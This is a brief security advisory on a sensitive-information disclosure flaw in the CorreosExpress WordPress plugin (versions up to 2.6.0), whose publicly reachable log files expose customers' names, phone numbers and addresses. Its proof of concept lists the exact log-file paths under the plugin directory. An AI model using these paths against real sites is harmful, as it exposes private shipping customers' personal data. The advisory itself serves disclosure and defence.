CorreosExpress <= 2.6.0 - Sensitive Information Disclosure

The plugin generates log files which are publicly accessible, and contain sensitive information such as sender/receiver names, phone numbers, physical and email addresses

PoC

https://example.com/wp-content/plugins/correos-express/log/log_cron_function.txt https://example.com/wp-content/plugins/correos-express/log/log_ordenes.txt https://example.com/wp-content/plugins/correos-express/log/log_rest.txt